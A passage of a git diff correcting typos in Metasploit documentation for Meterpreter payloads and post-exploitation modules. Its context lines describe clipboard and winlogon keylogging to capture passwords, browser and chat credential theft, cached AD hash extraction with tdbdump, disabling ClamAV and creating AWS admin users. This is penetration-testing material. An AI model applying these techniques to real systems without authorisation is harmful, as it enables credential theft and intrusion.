b/documentation/modules/payload/windows/meterpreter/reverse_https.md @@ -484,7 +484,7 @@ OPTIONS: -h Help menu -t Retry total time (seconds) -w Retry wait time (seconds) - -x Expiration timout (seconds) + -x Expiration timeout (seconds) ``` To see the current timeout configuration, you can use the ```get_timeouts``` command: diff --git a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md index a6d3b90b67ee..6b4f8ae90c94 100644 --- a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md +++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md @@ -343,7 +343,7 @@ meterpreter > One great feature of the extension is clipboard management. The Windows clipboard is interesting because it can store anything that is sensitive, such as files, user names, and passwords, but it is not well protected. -For example, a password manager is a popular tool to store encryped passwords. It allows the user +For example, a password manager is a popular tool to store encrypted passwords. It allows the user to create complex passwords without the need to memorize any of them. All the user needs to do is open the password manager, retrieve the password for a particular account by copying it, and then paste it on a login page. @@ -353,7 +353,7 @@ in the operating system's clipboard. As an attacker, you can take advantage of t clipboard monitor from Meterpreter/extapi, and then collect whatever the user copies. To read whatever is currently stored in the target's clipboard, you can use the clipboard_get_data -commnad: +command: ``` meterpreter > clipboard_get_data @@ -590,7 +590,7 @@ OPTIONS: -h Help menu -t Retry total time (seconds) -w Retry wait time (seconds) - -x Expiration timout (seconds) + -x Expiration timeout (seconds) ``` To see the current timeout configuration, you can use the ```get_timeouts``` command: diff --git a/documentation/modules/post/android/gather/sub_info.md b/documentation/modules/post/android/gather/sub_info.md index cf5d4868f422..e1b20ec542dd 100644 --- a/documentation/modules/post/android/gather/sub_info.md +++ b/documentation/modules/post/android/gather/sub_info.md @@ -10,7 +10,7 @@ 3. Do: `use android/gather/sub_info` 4. Do: `set SESSION ` 5. Do: `run` - 6. You should be able to see the extracted subsriber information. + 6. You should be able to see the extracted subscriber information. ## Options diff --git a/documentation/modules/post/hardware/automotive/canprobe.md b/documentation/modules/post/hardware/automotive/canprobe.md index b3d72de70716..08bcc5815fe5 100644 --- a/documentation/modules/post/hardware/automotive/canprobe.md +++ b/documentation/modules/post/hardware/automotive/canprobe.md @@ -1,5 +1,5 @@ A basic fuzzer for CAN IDs. It can scan through CAN IDs and probes each data section -with a set value. The defualt is 0xFF. It can also iterate through all the possible +with a set value. The default is 0xFF. It can also iterate through all the possible values for each byte as well. It has no concept of what is going on and makes no attempt to check for return packets. @@ -15,7 +15,7 @@ attempt to check for return packets. **FUZZ** - If true the data segment will iterate through all possiblities (0-255). + If true the data segment will iterate through all possibilities (0-255). **PROBEVALUE** diff --git a/documentation/modules/post/hardware/automotive/getvinfo.md b/documentation/modules/post/hardware/automotive/getvinfo.md index c4a64602b6b6..2a9140e0d052 100644 --- a/documentation/modules/post/hardware/automotive/getvinfo.md +++ b/documentation/modules/post/hardware/automotive/getvinfo.md @@ -42,7 +42,7 @@ PIDs to ASCII. ``` hwbridge > run post/hardware/automotive/getvinfo CANBUS=can2 -[*] Avaiable PIDS for pulling realitme data: 46 pids +[*] Available PIDS for pulling realitme data: 46 pids [*] [1, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17, 19, 20, 21, 24, 25, 28, 31, 32, 32, 33, 44, 45, 46, 47, 48, 49, 50, 51, 60, 61, 64, 65, 66, 67, 68, 69, 70, 71, 73, 74, 76] [*] MIL (Engine Light) : OFF [*] Number of DTCs: 0 diff --git a/documentation/modules/post/linux/gather/hashdump.md b/documentation/modules/post/linux/gather/hashdump.md index 5fcec802b516..748e0ccf364b 100644 --- a/documentation/modules/post/linux/gather/hashdump.md +++ b/documentation/modules/post/linux/gather/hashdump.md @@ -53,7 +53,7 @@ msf post(hashdump) > exploit [*] Post module execution completed ``` - This module only works when you are root or have root permisions. If you only have user permission, expect feedback: + This module only works when you are root or have root permissions. If you only have user permission, expect feedback: ``` msf > use auxiliary/scanner/ssh/ssh_login diff --git a/documentation/modules/post/linux/manage/disable_clamav.md b/documentation/modules/post/linux/manage/disable_clamav.md index 0f59dd456aa7..c468676c494c 100644 --- a/documentation/modules/post/linux/manage/disable_clamav.md +++ b/documentation/modules/post/linux/manage/disable_clamav.md @@ -4,7 +4,7 @@ ClamAV uses a Unix socket that allows non-privileged users to interact with the However, no additional checks are required to trigger ClamAV's shutdown. ## Verification Steps -### Shuting off ClamAV +### Shutting off ClamAV 1. Launch `msfconsole` 2. Get a Meterpreter shell on a Linux host that's also running ClamAV. 3. Do: `use post/linux/manage/disable_clamav` diff --git a/documentation/modules/post/multi/escalate/aws_create_iam_user.md b/documentation/modules/post/multi/escalate/aws_create_iam_user.md index e738a62b0847..57fcf2fb74fe 100644 --- a/documentation/modules/post/multi/escalate/aws_create_iam_user.md +++ b/documentation/modules/post/multi/escalate/aws_create_iam_user.md @@ -18,13 +18,13 @@ allowed to make. This module depends on administrators being lazy and not using the least privileges possible. We often see instances assigned `*.*` roles that allow any user on the instance to make any API call including creating admin users. -When this occours, a user with long lived credentials can be created and calls +When this occurs, a user with long lived credentials can be created and calls against the AWS API can be made from anywhere on the Internet. Once an account is taken over in this manner instances can be spun up, other users can be locked out, networks can be traversed, and many other dangeous things can happen. Only on rare cases should hosts have the following privileges, these should be -restriced. +restricted. * iam:CreateUser * iam:CreateGroup @@ -158,7 +158,7 @@ Module options (post/multi/escalate/aws_create_iam_user): Here we are assuming that we have taken over a host having an instance profile with overly permissive access. Once a session is established, we can load -`aws_create_iam_user` and specify a meterpreter sesssion, +`aws_create_iam_user` and specify a meterpreter session, e.g., `SESSION 1` and run the exploit. ``` diff --git a/documentation/modules/post/multi/gather/enum_hexchat.md b/documentation/modules/post/multi/gather/enum_hexchat.md index 599bbd78b5df..22de32e8977e 100644 --- a/documentation/modules/post/multi/gather/enum_hexchat.md +++ b/documentation/modules/post/multi/gather/enum_hexchat.md @@ -43,7 +43,7 @@ Only download the chat logs. ### CONFIGS -Only download teh config files. +Only download the config files. ## Options diff --git a/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md b/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md index 6653fd27a2f2..a212fb3c4963 100644 --- a/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md +++ b/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md @@ -35,7 +35,7 @@ * /var/lib/samba/private/secrets.tdb * /var/lib/samba/passdb.tdb - Use tdbdump to extract structed data from these files (`tdbdump #{filename}`), and search for the phrase + Use tdbdump to extract structured data from these files (`tdbdump #{filename}`), and search for the phrase `cachedPassword`. The hash should be in the same format as hashes in /etc/shadow (e.g. `$6$...`). JtR can natively crack these hashes. @@ -46,7 +46,7 @@ * /var/lib/sss/db/cache_* - Use tdbdump to extract structed data from these files (`tdbdump #{filename}`), and search for the phrase + Use tdbdump to extract structured data from these files (`tdbdump #{filename}`), and search for the phrase `cachedPassword`. The hash should be in the same format as hashes in /etc/shadow (e.g. `$6$...`). JtR can natively crack these hashes. diff --git a/documentation/modules/post/multi/manage/open.md b/documentation/modules/post/multi/manage/open.md index ad26c34bb49e..2330b33a055f 100644 --- a/documentation/modules/post/multi/manage/open.md +++ b/documentation/modules/post/multi/manage/open.md @@ -21,4 +21,4 @@ The following platforms are supported: **URI** -The URI that should be passed to the opening command, can be a webiste or a file. +The URI that should be passed to the opening command, can be a website or a file. diff --git a/documentation/modules/post/multi/manage/play_youtube.md b/documentation/modules/post/multi/manage/play_youtube.md index 16c5800a6346..4890290c3b0e 100644 --- a/documentation/modules/post/multi/manage/play_youtube.md +++ b/documentation/modules/post/multi/manage/play_youtube.md @@ -5,14 +5,14 @@ compromised host. **EMBED** -Whether or not to use the `/embed` YouTube URL. The embeded version provides a +Whether or not to use the `/embed` YouTube URL. The embedded version provides a clean interface and will start playing in fullscreen but is not compatible with all YouTube videos, for example Rick Astley - Never Gonna Give You Up (VID: [`dQw4w9WgXcQ`][1]) is not compatible. While the non-embeded version has greater compatibility, there is a chance that an advertisement may be played before the video. It is recommended to use the -embeded version when the video is compatible. +embedded version when the video is compatible. **VID** diff --git a/documentation/modules/post/osx/gather/gitignore.md b/documentation/modules/post/osx/gather/gitignore.md index 0de945114234..d5ed085c1a0a 100644 --- a/documentation/modules/post/osx/gather/gitignore.md +++ b/documentation/modules/post/osx/gather/gitignore.md @@ -13,7 +13,7 @@ as well as retrieves the contents of files found in the gitignore. 4. Do: `set session #` 5. Do: `set mode 1` 5. Do: `run` - 6. You should see a list of all gitignore files with absolute path located recurively from the users'r home directory + 6. You should see a list of all gitignore files with absolute path located recursively from the users'r home directory Retrieve gitignore files: 7. Do: `set mode 2` diff --git a/documentation/modules/post/windows/capture/keylog_recorder.md b/documentation/modules/post/windows/capture/keylog_recorder.md index 57c3f5a1a6aa..7701620a7c19 100644 --- a/documentation/modules/post/windows/capture/keylog_recorder.md +++ b/documentation/modules/post/windows/capture/keylog_recorder.md @@ -10,11 +10,11 @@ This module captures keystrokes from a Windows target and saves them to a text f - **INTERVAL** - The interval in seconds that the module uses for recording keystrokes. The log file goes to a new line at the end of each interval. Default value is 5 seconds. -- **LOCKSCREEN** - This option locks the screen of the target when set to TRUE. CAPTURE_TYPE must be set to winlogon. MIGRATE must be set to TRUE or the session must already be in winlogon.exe. Defalt value is FALSE. +- **LOCKSCREEN** - This option locks the screen of the target when set to TRUE. CAPTURE_TYPE must be set to winlogon. MIGRATE must be set to TRUE or the session must already be in winlogon.exe. Default value is FALSE. - **MIGRATE** - This option migrates the session based on the CAPTURE_TYPE. Explorer.exe for explorer, winlogon.exe for winlogon, or a specified PID for pid. Default value is FALSE. -- **PID** - The PID of a process to migrate the session into. CAPTURE_TYPE of pid must be set, and the sepecified PID must exist on the target machine. +- **PID** - The PID of a process to migrate the session into. CAPTURE_TYPE of pid must be set, and the specified PID must exist on the target machine. - **SESSION** - The session to run the module on. @@ -26,11 +26,11 @@ This module captures keystrokes from a Windows target and saves them to a text f The Meterpreter session must be located in an appropriate process for keystroke recording to work properly. This is described in the below-listed capture types. This module can migrate the session if MIGRATE is set to TRUE. If winlogon or PID migration fails, the module will exit. Set MIGRATE to FALSE if migration will be performed manually or through another module. ### Capture Types -- **Explorer.exe** - __Session must be in explorer.exe__ - The most common capture type. Keystrokes are recorded from most user level applications. Applications running at an elevated level will likely not get recorded. **NOTE: Sessions running with elevated privileges are downgraded to user level when migrated into explorer.exe.** It is recommended that a second session be opened for keystroke recording if elevated priveledges are to be maintained. +- **Explorer.exe** - __Session must be in explorer.exe__ - The most common capture type. Keystrokes are recorded from most user level applications. Applications running at an elevated level will likely not get recorded. **NOTE: Sessions running with elevated privileges are downgraded to user level when migrated into explorer.exe.** It is recommended that a second session be opened for keystroke recording if elevated privileges are to be maintained. - **Winlogon.exe** - __Session must be in winlogon.exe__ - Administrator or SYSTEM rights are required to migrate to winlogon.exe. Keylogging from this process records usernames and passwords as users log in. This capture type does not record keystrokes from any other process. Setting LOCKSCREEN to true locks Windows when the module is executed. This forces the user to unlock the computer, and their password is captured. -- **PID** - __Session must be in the specific process to be recorded.__ - This option is useful for recording keystrokes in applications or process that run with elevated priveledges. However, admin or SYSTEM rights are required to migrate to these processes. Only keystrokes from the specified process are recorded. +- **PID** - __Session must be in the specific process to be recorded.__ - This option is useful for recording keystrokes in applications or process that run with elevated privileges. However, admin or SYSTEM rights are required to migrate to these processes. Only keystrokes from the specified process are recorded. ## Running Module as a Job It is recommended to run this module as a job using: `exploit -j` or `run -j`. As a job, the module runs in the background preventing it from tying up the Framework's user interface. To stop capturing keystrokes, kill the job using `jobs -k`. The module records the last few keystrokes before exit. Stopping the job can take up to 30 seconds. If the session is killed, the key log job shuts down automatically. diff --git a/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md b/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md index f1df769ae6ac..ebd3506da8dd 100644 --- a/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md +++ b/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md @@ -23,7 +23,7 @@ If you want to confirm the vulnerability before you add user or perform any othe Confirmation: Then go to meterpreter session and confirm running process (ps) -If you see notepad.exe running as SYSYEM then that is as indication of vulnerable system. +If you see notepad.exe running as SYSTEM then that is as indication of vulnerable system. ## Options diff --git a/documentation/modules/post/windows/gather/bitlocker_fvek.md b/documentation/modules/post/windows/gather/bitlocker_fvek.md index cbc7ade433d3..0f7fedfc25b0 100644 --- a/documentation/modules/post/windows/gather/bitlocker_fvek.md +++ b/documentation/modules/post/windows/gather/bitlocker_fvek.md @@ -38,7 +38,7 @@ This module enumerates ways to decrypt a Bitlocker volume and if a recovery key DRIVE_LETTER => c msf post(windows/gather/bitlocker_fvek) > run - [+] Successfuly opened Disk 0 + [+] Successfully opened Disk 0 [*] Trying to gather a recovery key [+] Recovery key found : 579744-627517-149402-208362-055022-542289-041470-364089 [*] The recovery key derivation usually take 20 seconds... diff --git a/documentation/modules/post/windows/gather/bloodhound.md b/documentation/modules/post/windows/gather/bloodhound.md index b62c71314b72..7018c996675d 100644 --- a/documentation/modules/post/windows/gather/bloodhound.md +++ b/documentation/modules/post/windows/gather/bloodhound.md @@ -1,7 +1,7 @@ ## Vulnerable Application This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more. -With this information BloodHound will easily identify highly complex privilage elevation attack paths that would otherwise be +With this information BloodHound will easily identify highly complex privilege elevation attack paths that would otherwise be impossible to quickly identify within an Active Directory environment. This module can take several/many minutes to run due to the volume of data being collected. diff --git a/documentation/modules/post/windows/gather/credentials/aim.md b/documentation/modules/post/windows/gather/credentials/aim.md index db1106e16c5c..3c6939ec5dcb 100644 --- a/documentation/modules/post/windows/gather/credentials/aim.md +++ b/documentation/modules/post/windows/gather/credentials/aim.md @@ -25,9 +25,9 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/chrome.md b/documentation/modules/post/windows/gather/credentials/chrome.md index c81eb09e53d6..748c7dcbb99c 100644 --- a/documentation/modules/post/windows/gather/credentials/chrome.md +++ b/documentation/modules/post/windows/gather/credentials/chrome.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/comodo.md b/documentation/modules/post/windows/gather/credentials/comodo.md index 0bdf413db0b4..3022a0a91d18 100644 --- a/documentation/modules/post/windows/gather/credentials/comodo.md +++ b/documentation/modules/post/windows/gather/credentials/comodo.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/coolnovo.md b/documentation/modules/post/windows/gather/credentials/coolnovo.md index a48a0bdf18ca..8e9c5e8891a7 100644 --- a/documentation/modules/post/windows/gather/credentials/coolnovo.md +++ b/documentation/modules/post/windows/gather/credentials/coolnovo.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ``` diff --git a/documentation/modules/post/windows/gather/credentials/digsby.md b/documentation/modules/post/windows/gather/credentials/digsby.md index a94c0fef3025..4f4ffc09493f 100644 --- a/documentation/modules/post/windows/gather/credentials/digsby.md +++ b/documentation/modules/post/windows/gather/credentials/digsby.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ``` diff --git a/documentation/modules/post/windows/gather/credentials/flock.md b/documentation/modules/post/windows/gather/credentials/flock.md index 708b1677ada3..bb094112eff7 100644 --- a/documentation/modules/post/windows/gather/credentials/flock.md +++ b/documentation/modules/post/windows/gather/credentials/flock.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/gadugadu.md b/documentation/modules/post/windows/gather/credentials/gadugadu.md index 890412772aaa..e80321715085 100644 --- a/documentation/modules/post/windows/gather/credentials/gadugadu.md +++ b/documentation/modules/post/windows/gather/credentials/gadugadu.md @@ -25,10 +25,10 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/icq.md b/documentation/modules/post/windows/gather/credentials/icq.md index b9765053f664..c5b7745d9186 100644 --- a/documentation/modules/post/windows/gather/credentials/icq.md +++ b/documentation/modules/post/windows/gather/credentials/icq.md @@ -25,10 +25,10 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/ie.md b/documentation/modules/post/windows/gather/credentials/ie.md index 754f6937560b..f13d41fb2af3 100644 --- a/documentation/modules/post/windows/gather/credentials/ie.md +++ b/documentation/modules/post/windows/gather/credentials/ie.md @@ -25,9 +25,9 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. \ No newline at end of file +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. \ No newline at end of file diff --git a/documentation/modules/post/windows/gather/credentials/incredimail.md b/documentation/modules/post/windows/gather/credentials/incredimail.md index 58bf018d1cfe..21b658e9038d 100644 --- a/documentation/modules/post/windows/gather/credentials/incredimail.md +++ b/documentation/modules/post/windows/gather/credentials/incredimail.md @@ -23,8 +23,8 @@ Users can set their own regular expressions so that it could be applied for the By default verbose is turned off. When turned on, the module will show information on files which aren't extracted and information that is not directly related to the artifact output. ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/kakaotalk.md b/documentation/modules/post/windows/gather/credentials/kakaotalk.md index c918c0eedba9..21ce09231cf4 100644 --- a/documentation/modules/post/windows/gather/credentials/kakaotalk.md +++ b/documentation/modules/post/windows/gather/credentials/kakaotalk.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/kmeleon.md b/documentation/modules/post/windows/gather/credentials/kmeleon.md index c5ce252a930d..4ee887430026 100644 --- a/documentation/modules/post/windows/gather/credentials/kmeleon.md +++ b/documentation/modules/post/windows/gather/credentials/kmeleon.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/line.md b/documentation/modules/post/windows/gather/credentials/line.md index 171d692455f0..3040d715fdaa 100644 --- a/documentation/modules/post/windows/gather/credentials/line.md +++ b/documentation/modules/post/windows/gather/credentials/line.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/maxthon.md b/documentation/modules/post/windows/gather/credentials/maxthon.md index 01d322665c3c..0110723de137 100644 --- a/documentation/modules/post/windows/gather/credentials/maxthon.md +++ b/documentation/modules/post/windows/gather/credentials/maxthon.md @@ -25,10 +25,10 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/miranda.md b/documentation/modules/post/windows/gather/credentials/miranda.md index 86706043cb7e..0df0cae0215a 100644 --- a/documentation/modules/post/windows/gather/credentials/miranda.md +++ b/documentation/modules/post/windows/gather/credentials/miranda.md @@ -25,9 +25,9 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/opera.md b/documentation/modules/post/windows/gather/credentials/opera.md index 6e079942d142..6ccfbf87da07 100644 --- a/documentation/modules/post/windows/gather/credentials/opera.md +++ b/documentation/modules/post/windows/gather/credentials/opera.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/operamail.md b/documentation/modules/post/windows/gather/credentials/operamail.md index f0b95e35246b..8538b78e0ab8 100644 --- a/documentation/modules/post/windows/gather/credentials/operamail.md +++ b/documentation/modules/post/windows/gather/credentials/operamail.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/postbox.md b/documentation/modules/post/windows/gather/credentials/postbox.md index 22dd0b3ce45d..ce6448d4a3e7 100644 --- a/documentation/modules/post/windows/gather/credentials/postbox.md +++ b/documentation/modules/post/windows/gather/credentials/postbox.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/qq.md b/documentation/modules/post/windows/gather/credentials/qq.md index 7fb9495cea0a..22dc0d0f85f1 100644 --- a/documentation/modules/post/windows/gather/credentials/qq.md +++ b/documentation/modules/post/windows/gather/credentials/qq.md @@ -25,9 +25,9 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/safari.md b/documentation/modules/post/windows/gather/credentials/safari.md index a007b8aa2a41..7d64f6fa4b56 100644 --- a/documentation/modules/post/windows/gather/credentials/safari.md +++ b/documentation/modules/post/windows/gather/credentials/safari.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/seamonkey.md b/documentation/modules/post/windows/gather/credentials/seamonkey.md index 0852b1c3ac21..eb63180a5c5b 100644 --- a/documentation/modules/post/windows/gather/credentials/seamonkey.md +++ b/documentation/modules/post/windows/gather/credentials/seamonkey.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and 